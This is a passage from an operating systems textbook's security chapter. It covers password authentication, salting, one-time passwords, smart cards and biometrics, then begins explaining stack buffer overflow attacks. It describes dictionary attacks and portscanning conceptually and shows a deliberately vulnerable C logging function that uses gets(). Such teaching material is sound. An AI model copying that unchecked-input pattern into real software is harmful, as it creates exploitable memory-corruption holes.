the combined hash of all three components and compares it to the value of the PCR
received from the attesting side. If the values match, the challenging side is sure
that the attesting side was started with exactly those three components. The signed
result prevents attackers from forging the result, and since we know that the trusted
bootloader performs the appropriate measurement of the kernel and the kernel in
turn measures the application, no other code configuration could have produced the
same hash chain.
     TPM has a variety of other uses that we do not have space to get into. Inter-
estingly enough, the one thing TPM does not do is make computers more secure
against external attacks. What it really focuses on is using cryptography to prevent
users from doing anything not approved directly or indirectly by whoever controls
the TPM. If you would like to learn more about this subject, the article on Trusted
Computing in the Wikipedia is a good place to start.
9.6 AUTHENTICATION
     Every secured computer system must require all users to be authenticated at
login time. After all, if the operating system cannot be sure who the user is, it can-
not know which files and other resources he can access. While authentication may
sound like a trivial topic, it is a bit more complicated than you might expect. Read
on.
     User authentication is one of those things we meant by ``ontogeny recapitu-
lates phylogeny'' in Sec. 1.5.7.  Early mainframes, such as the ENIAC, did not
have an operating system, let alone a login procedure. Later mainframe batch and
timesharing systems generally did have a login procedure for authenticating jobs
and users.
     Early minicomputers (e.g., PDP-1 and PDP-8) did not have a login procedure,
but with the spread of UNIX on the PDP-11 minicomputer, logging in was again
needed. Early personal computers (e.g., Apple II and the original IBM PC) did not



SEC. 9.6                            AUTHENTICATION                                      627
have a login procedure, but more sophisticated personal computer operating sys-
tems, such as Linux and Windows 8, do (although foolish users can disable it).
Machines on corporate LANs almost always have a login procedure configured so
that users cannot bypass it. Finally, many people nowadays (indirectly) log into re-
mote computers to do Internet banking, engage in e-shopping, download music,
and other commercial activities. All of these things require authenticated login, so
user authentication is once again an important topic.
Having determined that authentication is often important, the next step is to
find a good way to achieve it. Most methods of authenticating users when they at-
tempt to log in are based on one of three general principles, namely identifying
1.        Something the user knows.
2.        Something the user has.
3.        Something the user is.
Sometimes two of these are required for additional security. These principles lead
to different authentication schemes with different complexities and security proper-
ties. In the following sections we will examine each of these in turn.
The most widely used form of authentication is to require the user to type a
login name and a password. Password protection is easy to understand and easy to
implement.  The simplest implementation just keeps a central list of (login-name,
password) pairs. The login name typed in is looked up in the list and the typed
password is compared to the stored password.  If they match, the login is allowed;
if they do not match, the login is rejected.
It goes almost without saying that while a password is being typed in, the com-
puter should not display the typed characters, to keep them from prying eyes near
the monitor. With Windows, as each character is typed, an asterisk is displayed.
With UNIX, nothing at all is displayed while the password is being typed. These
schemes have different properties.   The Windows scheme may make it easy for
absent-minded users to see how many characters they have typed so far, but it also
discloses the password length to ``eavesdroppers'' (for some reason, English has a
word for auditory snoopers but not for visual snoopers, other than perhaps Peeping
Tom, which does not seem right in this context).       From a security perspective,
silence is golden.
Another area in which not quite getting it right has serious security implica-
tions is illustrated in Fig. 9-17.  In Fig. 9-17(a), a successful login is shown, with
system output in uppercase and user input in lowercase.  In Fig. 9-17(b), a failed
attempt by a cracker to log into System A is shown. In Fig. 9-17(c) a failed attempt
by a cracker to log into System B is shown.
In Fig. 9-17(b), the system complains as soon as it sees an invalid login name.
This is a mistake, as it allows the cracker to keep trying login names until she finds
a valid one. In Fig. 9-17(c), the cracker is always asked for a password and gets no



628                                  SECURITY                                             CHAP. 9
LOGIN: mitch                      LOGIN: carol                   LOGIN: carol
PASSWORD: FooBar!-7               INVALID LOGIN NAME             PASSWORD: Idunno
SUCCESSFUL LOGIN                  LOGIN:                         INVALID LOGIN
                                                                 LOGIN:
     (a)                          (b)                            (c)
          Figure 9-17. (a) A successful login. (b) Login rejected after name is entered.
          (c) Login rejected after name and password are typed.
feedback about whether the login name itself is valid. All she learns is that the
login name plus password combination tried is wrong.
     As an aside on login procedures, most notebook computers are configured to
require a login name and password to protect their contents in the event they are
lost are stolen. While better than nothing, it is not much better than nothing.           Any-
one who gets hold of the notebook can turn it on and immediately go into the
BIOS setup program by hitting DEL or F8 or some other BIOS-specific key (usual-
ly displayed on the screen) before the operating system is started. Once there, he
can change the boot sequence, telling it to boot from a USB stick before trying the
hard disk. The finder then inserts a USB stick containing a complete operating sys-
tem and boots from it. Once running, the hard disk can be mounted (in UNIX) or
accessed as the D: drive (Windows).    To prevent this situation, most BIOSes allow
the user to password protect the BIOS setup program so that only the owner can
change the boot sequence.  If you have a notebook computer, stop reading now.
Go put a password on your BIOS, then come back.
Weak Passwords
     Often, crackers break in simply by connecting to the target computer (e.g.,
over the Internet) and trying many (login name, password) combinations until they
find one that works. Many people use their name in one form or another as their
login name.    For Someone named ``Ellen Ann Smith,'' ellen, smith, ellen                 smith,
ellen-smith, ellen.smith, esmith, easmith, and eas are all reasonable candidates.
Armed with one of those books entitled 4096 Names for Your New Baby, plus a
telephone book full of last names, a cracker can easily compile a computerized list
of potential login names appropriate to the country being attacked (ellen                 smith
might work fine in the United States or England, but probably not in Japan).
     Of course, guessing the login name is not enough. The password has to be
guessed, too.  How hard is that?  Easier than you think. The classic work on pass-
word security was done by Morris and Thompson (1979) on UNIX systems. They
compiled a list of likely passwords: first and last names, street names, city names,
words from a moderate-sized dictionary (also words spelled backward), license
plate numbers, etc.  They then compared their list to the system password file to
see if there were any matches. Over 86% of all passwords turned up in their list.



SEC. 9.6                          AUTHENTICATION                                       629
Lest anyone think that better-quality users pick better-quality passwords, rest
assured that they do not. When in 2012, 6.4 million LinkedIn (hashed) passwords
leaked to the Web after a hack, many people had fun analyzing the results. The
most popular password was ``password''. The second most popular was ``123456''
(``1234'',  ``12345'',  and  ``12345678''  were  also  in  the  top  10).  Not  exactly
uncrackable. In fact, crackers can compile a list of potential login names and a list
of potential passwords without much work and run a program to try them on as
many computers as they can.
This is similar to what researchers at IOActive did in March 2013. They
scanned a long list of home routers and set-top boxes to see if they were vulnerable
to the simplest possible attack. Rather than trying out many login names and pass-
words, as we suggested, they tried only the well-known default login and password
installed by the manufacturers. Users are supposed to change these values im-
mediately, but it appears that many do not. The researchers found that hundreds of
thousands of such devices are potentially vulnerable. Perhaps even more worrying,
the Stuxnet attack on an Iranian nuclear facility made use of the fact that the
Siemens computers controlling the centrifuges used a default password--one that
had been circulating on the Internet for years.
The growth of the Web has made the problem much worse. Instead of having
only one password, many people now have dozens or even hundreds. Since remem-
bering them all is too hard, they tend to choose simple, weak passwords and reuse
them on many Websites (Florencio and Herley, 2007; and Taiabul Haque et al.,,
2013).
Does it really matter if passwords are easy to guess? Yes, absolutely. In 1998,
the San Jose Mercury News reported that a Berkeley resident, Peter Shipley, had
set up several unused computers as war dialers, which dialed all 10,000 telephone
numbers belonging to an exchange [e.g., (415) 770-xxxx], usually in random order
to thwart telephone companies that frown upon such usage and try to detect it.
After making 2.6 million calls, he located 20,000 computers in the Bay Area, 200
of which had no security at all.
The Internet has been a godsend to crackers. It takes all the drudgery out of
their work. No more phone numbers to dial (and no more dial tones to wait for).
``War dialing'' now works like this. A cracker may write a script ping (send a net-
work packet) to a set of IP addresses. If it receives any response at all, the script
subsequently tries to set up a TCP connection to all the possible services that may
be be running on the machine. As mentioned earlier, this mapping out of what is
running on which computer is known as portscanning and instead of writing a
script from scratch, the attacker may just as well use specialized tools like nmap
that provide a wide range of advanced portscanning techniques. Now that the at-
tacker knows which servers are running on which machine, the next step is to
launch the attack. For instance, if the attacker wanted to probe the password pro-
tection, he would connect to those services that use this method of authentication,
like the telnet server, or even the Web server. We have already seen that default and



630                           SECURITY        CHAP. 9
otherwise weak password enable attackers to harvest a large number of accounts,
sometimes with full administrator rights.
UNIX Password Security
     Some (older) operating systems keep the password file on the disk in unen-
crypted form, but protected by the usual system protection mechanisms. Having all
the passwords in a disk file in unencrypted form is just looking for trouble because
all too often many people have access to it. These may include system administra-
tors, machine operators, maintenance personnel, programmers, management, and
maybe even some secretaries.
     A better solution, used in UNIX systems, works like this. The login program
asks the user to type his name and password.  The password is immediately ``en-
crypted'' by using it as a key to encrypt a fixed block of data. Effectively, a one-
way function is being run, with the password as input and a function of the pass-
word as output. This process is not really encryption, but it is easier to speak of it
as encryption. The login program then reads the password file, which is just a
series of ASCII lines, one per user, until it finds the line containing the user's login
name.  If the (encrypted) password contained in this line matches the encrypted
password just computed, the login is permitted, otherwise it is refused. The advan-
tage of this scheme is that no one, not even the superuser, can look up any users'
passwords because they are not stored in unencrypted form anywhere in the sys-
tem. For illustration purposes, we assume for now that the encrypted password is
stored in the password file itself. Later, we will see, this is no longer the case for
modern variants of UNIX.
     If the attacker manages to get hold of the encrypted password, the scheme can
be attacked, as follows.     A cracker first builds a dictionary of likely passwords the
way Morris and Thompson did.  At leisure, these are encrypted using the known
algorithm.  It does not matter how long this process takes because it is done in ad-
vance of the break-in. Now armed with a list of (password, encrypted password)
pairs, the cracker strikes.  He reads the (publicly accessible) password file and
strips out all the encrypted passwords. These are compared to the encrypted pass-
words in his list.  For every hit, the login name and unencrypted password are now
known. A simple shell script can automate this process so it can be carried out in a
fraction of a second. A typical run of the script will yield dozens of passwords.
     After recognizing the possibility of this attack, Morris and Thompson de-
scribed a technique that renders the attack almost useless. Their idea is to associate
an n-bit random number, called the salt, with each password. The random number
is changed whenever the password is changed. The random number is stored in the
password file in unencrypted form, so that everyone can read it. Instead of just
storing the encrypted password in the password file, the password and the random
number are first concatenated and then encrypted together. This encrypted result is
then stored in the password file, as shown in Fig. 9-18 for a password file with five



SEC. 9.6                          AUTHENTICATION                                        631
users, Bobbie, Tony, Laura, Mark, and Deborah. Each user has one line in the file,
with three entries separated by commas: login name, salt, and encrypted password
+ salt. The notation e(Dog, 4238) represents the result of concatenating Bobbie's
password, Dog, with her randomly assigned salt, 4238, and running it through the
encryption function, e.   It is the result of that encryption that is stored as the third
field of Bobbie's entry.
                          Bobbie, 4238, e(Dog, 4238)
                          Tony, 2918, e(6%%TaeFF, 2918)
                          Laura, 6902, e(Shakespeare, 6902)
                          Mark, 1694, e(XaB#Bwcz, 1694)
                          Deborah, 1092, e(LordByron,1092)
        Figure 9-18.  The use of salt to defeat precomputation of encrypted passwords.
       Now consider the implications for a cracker who wants to build up a list of
likely passwords, encrypt them, and save the results in a sorted file, f, so that any
encrypted password can be looked up easily.   If an intruder suspects that Dog
might be a password, it is no longer sufficient just to encrypt Dog and put the result
in f.  He has to encrypt 2n  strings, such as Dog0000, Dog0001, Dog0002, and so
forth and enter all of them in f. This technique increases the size of f by 2n. UNIX
uses this method with n = 12.
       For additional security, modern versions of UNIX typically store the encrypted
passwords in a separate ``shadow'' file that, unlike the password file, is only read-
able by root. The combination of salting the password file and making it unread-
able except indirectly (and slowly) can generally withstand most attacks on it.
One-Time Passwords
       Most superusers exhort their mortal users to change their passwords once a
month.    It falls on deaf ears.  Even more extreme is changing the password with
every login, leading to one-time passwords.   When one-time passwords are used,
the user gets a book containing a list of passwords. Each login uses the next pass-
word in the list.  If an intruder ever discovers a password, it will not do him any
good, since next time a different password must be used.     It is suggested that the
user try to avoid losing the password book.
       Actually, a book is not needed due to an elegant scheme devised by Leslie
Lamport that allows a user to log in securely over an insecure network using one-
time passwords (Lamport, 1981).   Lamport's method can be used to allow a user
running on a home PC to log in to a server over the Internet, even though intruders
may see and copy down all the traffic in both directions. Furthermore, no secrets
have to be stored in the file system of either the server or the user's PC. The meth-
od is sometimes called a one-way hash chain.



632                                   SECURITY                                   CHAP. 9
      The algorithm is based on a one-way function, that is, a function y = f (x) that
has the property that given x it is easy to find y, but given y it is computationally
infeasible to find x.       The input and output should be the same length, for example,
256 bits.
      The user picks a secret password that he memorizes.  He also picks an integer,
n, which is how many one-time passwords the algorithm is able to generate. As an
example, consider n = 4, although in practice a much larger value of n would be
used.     If the secret password is s, the first password is given by running the one-
way function n times:
      P1 = f ( f ( f ( f (s))))
The second password is given by running the one-way function n - 1 times:
      P2 = f ( f ( f (s)))
The third password runs          f  twice and the fourth password runs it once.  In general,
Pi-1   =  f (Pi).  The key fact to note here is that given any password in the sequence,
it is easy to compute the previous one in the numerical sequence but impossible to
compute the next one. For example, given P2 it is easy to find P1 but impossible to
find P3.
      The server is initialized with P0, which is just  f (P1).  This value is stored in
the password file entry associated with the user's login name along with the integer
1, indicating that the next password required is P1.    When the user wants to log in
for the first time, he sends his login name to the server, which responds by sending
the integer in the password file, 1.   The user's machine responds with P1, which
can be computed locally from s, which is typed in on the spot. The server then
computes f (P1) and compares this to the value stored in the password file (P0). If
the values match, the login is permitted, the integer is incremented to 2, and P1
overwrites P0 in the password file.
      On the next login, the server sends the user a 2, and the user's machine com-
putes P2.    The server then computes  f (P2) and compares it to the entry in the
password file.     If the values match, the login is permitted, the integer is incre-
mented to 3, and P2 overwrites P1 in the password file. The property that makes
this scheme work is that even though an intruder may capture Pi, he has no way to
compute Pi+1 from it, only Pi-1 which has already been used and is now worthless.
When all n passwords have been used up, the server is reinitialized with a new
secret key.
Challenge-Response Authentication
      A variation on the password idea is to have each new user provide a long list of
questions and answers that are then stored on the server securely (e.g., in encrypted
form). The questions should be chosen so that the user does not need to write them
down. Possible questions that could be asked are:



SEC. 9.6                       AUTHENTICATION                                           633
1.        Who is Marjolein's sister?
2.        On what street was your elementary school?
3.        What did Mrs. Ellis teach?
At login, the server asks one of them at random and checks the answer.      To make
this scheme practical, though, many question-answer pairs would be needed.
Another variation is challenge-response.  When this is used, the user picks an
algorithm when signing up as a user, for example x2. When the user logs in, the
server sends the user an argument, say 7, in which case the user types 49.  The al-
gorithm can be different in the morning and afternoon, on different days of the
week, and so on.
If the user's device has real computing power, such as a personal computer, a
personal digital assistant, or a cell phone, a more powerful form of challenge-re-
sponse can be used.  In advance, the user selects a secret key, k, which is initially
brought to the server system by hand.  A copy is also kept (securely) on the user's
computer.  At login time, the server sends a random number, r, to the user's com-
puter, which then    computes  f (r, k) and sends that  back,  where f is a publicly
known function. The server then does the computation itself and checks if the re-
sult sent back agrees with the computation. The advantage of this scheme over a
password is that even if a wiretapper sees and records all the traffic in both direc-
tions, he will learn nothing that helps him next time.  Of course, the function, f, has
to be complicated enough that k cannot be deduced, even given a large set of obser-
vations. Cryptographic hash functions are good choices, with the argument being
the XOR of r and k. These functions are known to be hard to reverse.
9.6.1 Authentication Using a Physical Object
The second method for authenticating users is to check for some physical ob-
ject they have rather than something they know. Metal door keys have been used
for centuries for this purpose. Nowadays, the physical object used is often a plastic
card that is inserted into a reader associated with the computer. Normally, the user
must not only insert the card, but must also type in a password, to prevent someone
from using a lost or stolen card. Viewed this way, using a bank's ATM (Automated
Teller Machine) starts out with the user logging in to the bank's computer via a re-
mote terminal (the ATM machine) using a plastic card and a password (currently a
4-digit PIN code in most countries, but this is just to avoid the expense of putting a
full keyboard on the ATM machine).
Information-bearing plastic cards come in two varieties: magnetic stripe cards
and chip cards. Magnetic stripe cards hold about 140 bytes of information written
on a piece of magnetic tape glued to the back of the card. This information can be
read out by the terminal and then sent to a central computer. Often the information



634                         SECURITY                                 CHAP. 9
contains the user's password (e.g., PIN code) so the terminal can perform an identi-
ty check even if the link to the main computer is down. Typically the password is
encrypted by a key known only to the bank. These cards cost about $0.10 to $0.50,
depending on whether there is a hologram sticker on the front and the production
volume.  As a way to identify users in general, magnetic stripe cards are risky be-
cause the equipment to read and write them is cheap and widespread.
     Chip cards contain a tiny integrated circuit (chip) on them. These cards can be
subdivided into two categories: stored value cards and smart cards.  Stored value
cards contain a small amount of memory (usually less than 1 KB) using ROM
technology to allow the value to be remembered when the card is removed from
the reader and thus the power turned off. There is no CPU on the card, so the value
stored must be changed by an external CPU (in the reader).  These cards are mass
produced by the millions for well under $1 and are used, for example, as prepaid
telephone cards. When a call is made, the telephone just decrements the value in
the card, but no money actually changes hands. For this reason, these cards are
generally issued by one company for use on only its machines (e.g., telephones or
vending machines).  They could be used for login authentication by storing a 1-KB
password in them that the reader would send to the central computer, but this is
rarely done.
     However, nowadays, much security work is being focused on the smart cards
which currently have something like a 4-MHz 8-bit CPU, 16 KB of ROM, 4 KB of
ROM, 512 bytes of scratch RAM, and a 9600-bps communication channel to the
reader.  The cards are getting smarter in time, but are constrained in a variety of
ways, including the depth of the chip (because it is embedded in the card), the
width of the chip (so it does not break when the user flexes the card) and the cost
(typically $1 to $20, depending on the CPU power, memory size, and presence or
absence of a cryptographic coprocessor).
     Smart cards can be used to hold money, as do stored value cards, but with
much better security and universality. The cards can be loaded with money at an
ATM machine or at home over the telephone using a special reader supplied by the
bank. When inserted into a merchant's reader, the user can authorize the card to
deduct a certain amount of money from the card (by typing YES), causing the card
to send a little encrypted message to the merchant. The merchant can later turn the
message over to a bank to be credited for the amount paid.
     The big advantage of smart cards over, say, credit or debit cards, is that they do
not need an online connection to a bank. If you do not believe this is an advantage,
try the following experiment. Try to buy a single candy bar at a store and insist on
paying with a credit card.  If the merchant objects, say you have no cash with you
and besides, you need the frequent flyer miles. You will discover that the merchant
is not enthusiastic about the idea (because the associated costs dwarf the profit on
the item). This makes smart cards useful for small store purchases, parking meters,
vending machines, and many other devices that normally require coins. They are in
widespread use in Europe and spreading elsewhere.



SEC. 9.6                          AUTHENTICATION                                                  635
Smart cards have many other potentially valuable uses (e.g., encoding the
bearer's allergies and other medical conditions in a secure way for use in emergen-
cies), but this is not the place to tell that story. Our interest here is how they can be
used for secure login authentication. The basic concept is simple: a smart card is a
small, tamperproof computer that can engage in a discussion (protocol) with a
central computer to authenticate the user. For example, a user wishing to buy
things at an e-commerce Website could insert a smart card into a home reader at-
tached to his PC. The e-commerce site would not only use the smart card to auth-
enticate the user in a more secure way than a password, but could also deduct the
purchase price from the smart card directly, eliminating a great deal of the over-
head (and risk) associated with using a credit card for online purchases.
Various authentication schemes can be used with a smart card.                         A particularly
simple challenge-response works like this.           The server sends a 512-bit random
number to the smart card, which then adds the user's 512-bit password stored in
the card's ROM to it. The sum is then squared and the middle 512 bits are sent
back to the server, which knows the user's password and can compute whether the
result is correct or not. The sequence is shown in Fig. 9-19.                    If a wiretapper sees
both messages, he will not be able to make much sense out of them, and recording
them for future use is pointless because on the next login, a different 512-bit ran-
dom number will be sent.    Of course, a much fancier algorithm than squaring can
be used, and always is.
                                                                                        Remote
                                                                                        computer
          Smart
          card                                       1. Challenge sent to smart card
          2. Smart                                              3. Response sent  back
          card
          computes
          response          Smart
                            card
                            reader
                    Figure  9-19. Use  of  a  smart  card  for  authentication.
One disadvantage of any fixed cryptographic protocol is that over the course of
time it could be broken, rendering the smart card useless. One way to avoid this
fate is to use the ROM on the card not for a cryptographic protocol, but for a Java
interpreter. The real cryptographic protocol is then downloaded onto the card as a
Java binary program and run interpretively.          In this way, as soon as one protocol is
broken, a new one can be installed worldwide in a straightforward way: next time



636                         SECURITY                                     CHAP. 9
the card is used, new software is installed on it. A disadvantage of this approach is
that it makes an already slow card even slower, but as technology improves, this
method is very flexible. Another disadvantage of smart cards is that a lost or stolen
one may be subject to a side-channel attack, for example a power analysis attack.
By observing the electric power consumed during repeated encryption operations,
an expert with the right equipment may be able to deduce the key. Measuring the
time to encrypt with various specially chosen keys may also provide valuable
information about the key.
9.6.2 Authentication Using Biometrics
     The third authentication method measures physical characteristics of the user
that are hard to forge. These are called biometrics (Boulgouris et al., 2010; and
Campisi, 2013).  For example, a fingerprint or voiceprint reader hooked up to the
computer could verify the user's identity.
     A typical biometrics system has two parts: enrollment and identification. Dur-
ing enrollment, the user's characteristics are measured and the results digitized.
Then significant features are extracted and stored in a record associated with the
user. The record can be kept in a central database (e.g., for logging in to a remote
computer), or stored on a smart card that the user carries around and inserts into a
remote reader (e.g., at an ATM machine).
     The other part is identification. The user shows up and provides a login name.
Then the system makes the measurement again.       If the new values match the ones
sampled at enrollment time, the login is accepted; otherwise it is rejected. The
login name is needed because the measurements are never exact, so it is difficult to
index them and then search the index. Also, two people might have the same char-
acteristics, so requiring the measured characteristics to match those of a specific
user is stronger than just requiring them to match those of any user.
     The characteristic chosen should have enough variability that the system can
distinguish among many people without error. For example, hair color is not a
good indicator because too many people share the same color. Also, the charac-
teristic should not vary over time and with some people, hair color does not have
this property. Similarly a person's voice may be different due to a cold and a face
may look different due to a beard or makeup not present at enrollment time. Since
later samples are never going to match the enrollment values exactly, the system
designers have to decide how good the match has to be to be accepted.    In particu-
lar, they have to decide whether it is worse to reject a legitimate user once in a
while or let an imposter get in once in a while.   An e-commerce site might decide
that rejecting a loyal customer might be worse than accepting a small amount of
fraud, whereas a nuclear weapons site might decide that refusing access to a gen-
uine employee was better than letting random strangers in twice a year.
     Now let us take a brief look at some of the biometrics that are in actual use.
Finger-length analysis is surprisingly practical.  When this is used, each computer



SEC. 9.6  AUTHENTICATION                                                              637
has a device like the one of Fig. 9-20.   The user inserts his hand into  it,  and the
length of all his fingers is measured and checked against the database.
                                          Spring
                                          Pressure plate
          Figure 9-20. A device for measuring finger length.
Finger-length measurements are not perfect, however. The system can be at-
tacked with hand molds made out of plaster of Paris or some other material, pos-
sibly with adjustable fingers to allow some experimentation.
Another biometric that is in widespread commercial use is iris recognition.
No two people have the same patterns (even identical twins), so iris recognition is
as good as fingerprint recognition and more easily automated (Daugman, 2004).
The subject just looks at a camera (at a distance of up to 1 meter), which pho-
tographs the subject's eyes, extracts certain characteristics by performing what is
called a gabor wavelet transformation, and compresses the results to 256 bytes.
This string is compared to the value obtained at enrollment time, and if the Ham-
ming distance is below some critical threshold, the person is authenticated.   (The
Hamming distance between two bit strings is the minimum number of changes
needed to transform one into the other.)
Any technique that relies on images is subject to spoofing. For example, a per-
son could approach the equipment (say, an ATM machine camera) wearing dark
glasses to which photographs of someone else's eyes were attached. After all, if the
ATM's camera can take a good iris photo at 1 meter, other people can do it too, and
at greater distances using telephoto lenses. For this reason, countermeasures may
be needed such as having the camera fire a flash, not for illumination purposes, but
to see if the pupil contracts in response or to see if the amateur photographer's
dreaded red-eye effect shows up in the flash picture but is absent when no flash is



638                                      SECURITY                           CHAP. 9
used. Amsterdam Airport has been using iris recognition technology since 2001 to
enable frequent travelers to bypass the normal immigration line.
     A somewhat different technique is signature analysis. The user signs his name
with a special pen connected to the computer, and the computer compares it to a
known specimen stored online or on a smart card. Even better is not to compare the
signature, but compare the pen motions and pressure made while writing it.               A
good forger may be able to copy the signature, but will not have a clue as to the
exact order in which the strokes were made or at what speed and what pressure.
     A scheme that relies on minimal special hardware is voice biometrics (Kaman
et al., 2013).   All that is needed is a microphone (or even a telephone); the rest is
software. In contrast to voice recognition systems, which try to determine what the
speaker is saying, these systems try to determine who the speaker is. Some systems
just require the user to say a secret password, but these can be defeated by an
eavesdropper who can record passwords and play them back later. More advanced
systems say something to the user and ask that it be repeated back, with different
texts used for each login. Some companies are starting to use voice identification
for applications such as home shopping over the telephone because voice identifi-
cation is less subject to fraud than using a PIN code for identification.       Voice
recognition can be combined with other biometrics such as face recognition for
better accuracy (Tresadern et al., 2013).
     We could go on and on with more examples, but two more will help make an
important point. Cats and other animals mark off their territory by urinating around
its perimeter. Apparently cats can identify each other's smell this way.    Suppose
that someone comes up with a tiny device capable of doing an instant urinalysis,
thereby providing a foolproof identification. Each computer could be equipped
with one of these devices, along with a discreet sign reading: ``For login, please
deposit sample here.'' This might be an absolutely unbreakable system, but it
would probably have a fairly serious user acceptance problem.
     When the above paragraph was included in an earlier edition of this book, it
was intended at least partly as a joke.    No more. In an example of life imitating art
(life imitating textbooks?), researchers have now developed odor-recognition sys-
tems that could be used as biometrics (Rodriguez-Lujan et al., 2013). Is Smell-O-
Vision next?
     Also potentially problematical is a system consisting of a thumbtack and a
small spectrograph. The user would be requested to press his thumb against the
thumbtack, thus extracting a drop of blood for spectrographic analysis.         So far,
nobody has published anything on this, but there is work on blood vessel imaging
as a biometric (Fuksis et al., 2011).
     Our  point  is  that  any  authentication  scheme  must   be  psychologically      ac-
ceptable to the user community. Finger-length measurements probably will not
cause any problem, but even something as nonintrusive as storing fingerprints on
line may be unacceptable to many people because they associate fingerprints with
criminals. Nevertheless, Apple introduced the technology on the iPhone 5S.



SEC. 9.7                    EXPLOITING SOFTWARE                                        639
9.7 EXPLOITING SOFTWARE
One of the main ways to break into a user's computer is by exploiting vulnera-
bilities in the software running on the system to make it do something different
than the programmer intended. For instance, a common attack is to infect a user's
browser   by  means  of  a  drive-by-download.    In this attack, the cybercriminal
infects the user's browser by placing malicious content on a Web server. As soon
as the user visits the Website, the browser is infected. Sometimes, the Web servers
are completely run by the attackers, in which case the attackers should find a way
to lure users to their Web site (spamming people with promises of free software or
movies might do the trick). However, it is also possible that attackers are able to
put malicious content on a legitimate Website (perhaps in the ads, or on a dis-
cussion board). Not so long ago, the Website of the Miami Dolphins was compro-
mised in this way, just days before the Dolphins hosted the Super Bowl, one of the
most anticipated sporting events of the year. Just days before the event, the Website
was extremely popular and many users visiting the Website were infected. After
the initial infection in a drive-by-download, the attacker's code running in the
browser downloads the real zombie software (malware), executes it, and makes
sure it is always started when the system boots.
Since this is a book on operating systems, the focus is on how to subvert the
operating system. The many ways one can exploit software bugs to attack Websites
and data bases are not covered here. The typical scenario is that somebody discov-
ers a bug in the operating system and then finds a way to exploit it to compromise
computers that are running the defective code. Drive-by-downloads are not really
part of the picture either, but we will see that many of the vulnerabilities and
exploits in user applications are applicable to the kernel also.
In Lewis Caroll's famous book Through the Looking Glass, the Red Queen
takes Alice on a crazy run. They run as fast as they can, but no matter how fast they
run, they always stay in the same place. That is odd, thinks Alice, and she says so.
``In our country you'd generally get to somewhere else--if you ran very fast for a
long time as we've been doing.'' ``A slow sort of country!'' said the Queen. ``Now,
here, you see, it takes all the running you can do, to keep in the same place. If you
want to get somewhere else, you must run at least twice as fast as that!''
The Red Queen effect is typical for evolutionary arms races. In the course of
millions of years, the ancestors of zebras and lions both evolved. Zebras became
faster and better at seeing, hearing and smelling predators--useful, if you want to
outrun the lions. But in the meantime, lions also became faster, bigger, stealthier
and better camouflaged--useful, if you like zebra. So, although the lion and the
zebra both ``improved'' their designs, neither became more successful at beating
the other in the hunt; both of them still exist in the wild.      Still, lions and zebras are
locked in an arms race. They are running to stand still. The Red Queen effect also
applies to program exploitation. Attacks become ever more sophisticated to deal
with increasingly advanced security measures.



640                                        SECURITY                               CHAP. 9
     Although every exploit involves a specific bug in a specific program, there are
several general categories of bugs that occur over and over and are worth studying
to see how attacks work. In the following sections we will examine not only a
number of these methods, but also countermeasures to stop them, and counter
countermeasures to evade these measures, and even some counter counter count-
ermeasures to counter these tricks, and so on. It will give you a good idea of the
arms race between attackers and defenders--and what it is like to go jogging with
the Red Queen.
     We will start our discussion with the venerable buffer overflow, one of the
most important exploitation techniques in the history of computer security. It was
already used in the very first Internet worm, written by Robert Morris Jr. in 1988,
and it is still widely used today. Despite all counter measures, researchers predict
that buffer overflows will be with us for quite some time yet (Van der Veen, 2012).
Buffer overflows are ideally suited for introducing three of the most important pro-
tection mechanisms available in most modern systems: stack canaries, data execu-
tion protection, and address-space layout randomization. After that, we will look at
other exploitation techniques, like format string attacks, integer overflows, and
dangling pointer exploits. So, get ready and put your black hat on!
9.7.1 Buffer Overflow Attacks
     One rich source of attacks has been due to the fact that virtually all operating
systems and most systems programs are written in the C or C++ programming lan-
guages (because programmers like them and they can be compiled to extremely ef-
ficient   object  code).   Unfortunately,  no  C  or  C++  compiler  does  array       bounds
checking. As an example, the C library function gets, which reads a string (of
unknown size) into a fixed-size buffer, but without checking for overflow, is notori-
ous for being subject to this kind of attack (some compilers even detect the use of
gets and warn about it). Consequently, the following code sequence is also not
checked:
     01. void A( ) {
     02.    char B[128];   /* reserve a buffer with space for 128 bytes on the stack */
     03.    printf ("Type log message:");
     04.    gets (B);      /* read log message from standard input into buffer */
     05.    writeLog (B);  /* output the string in a pretty format to the log file */
     06. }
     Function A represents a logging procedure--somewhat simplified. Every time
the function executes, it invites the user to type in a log message and then reads
whatever the user types in the buffer B, using the gets from the C library. Finally, it
calls the (homegrown) writeLog function that presumably writes out the log entry
in an attractive format (perhaps adding a date and time to the log message to make



SEC. 9.7                        EXPLOITING SOFTWARE                                           641
it easier to search the log later). Assume that function A is part of a privileged proc-
ess, for instance a program that is SETUID root. An attacker who is able to take
control of such a process, essentially has root privileges himself.
The code above has a severe bug, although it may not be immediately obvious.
The problem is caused by the fact that gets reads characters from standard input
until it encounters a newline character. It has no idea that buffer B can hold only
128 bytes.   Suppose the user types a line of 256 characters. What happens to the
remaining 128 bytes? Since gets does not check for buffer bounds violations, the
remaining bytes will be stored on the stack also, as if the buffer were 256 bytes
long. Everything that was originally stored at these memory locations is simply
overwritten. The consequences are typically disastrous.
In Fig. 9-21(a), we see the main program running, with its local variables on
the stack.   At some point it calls the procedure A, as shown in Fig. 9-21(b).                The
standard calling sequence starts out by pushing the return address (which points to
the instruction following the call) onto the stack.            It then transfers control to A,
which decrements the stack pointer by 128 to allocate storage for its local variable
(buffer B).
         Virtual address space         Virtual address  space          Virtual address space
0xFFFF...    Main's                    Main's                          Main's
             local              Stack  local                           local
Stack        variables                 variables                       variables
pointer                                Return addr                     Return addr
                                       A's local                       A's local
                                       variables        B              variables    B
                                SP                             SP
                                       Buffer B
             Program                   Program                         Program
             (a)                               (b)                            (c)
         Figure 9-21. (a) Situation when the main program is running.  (b) After the pro-
         cedure A has been called. (c) Buffer overflow shown in gray.
So what exactly will happen if the user provides more than 128 characters?
Figure 9-21(c) shows this situation. As mentioned, the gets function copies all the
bytes into and beyond the buffer, overwriting possibly many things on the stack,
but in particular overwriting the return address pushed there earlier. In other words,
part of the log entry now fills the memory location that the system assumes to hold
the address of the instruction to jump to when the function returns. As long as the
user typed in a regular log message, the characters of the message would probably



642                 SECURITY                             CHAP. 9
not represent a valid code address. As soon as the function A returns, the progam
would try to jump to an invalid target--something the system would not like at all.
In most cases, the program would crash immediately.
     Now assume that this is not a benign user who provides an overly long mes-
sage by mistake, but an attacker who provides a tailored messsage specifically
aimed at subverting the program's control flow. Say the attacker provides an input
that is carefully crafted to overwrite the return address with the address of buffer B.
The result is that upon returning from function A, the program will jump to the be-
ginning of buffer B and execute the bytes in the buffer as code. Since the attacker
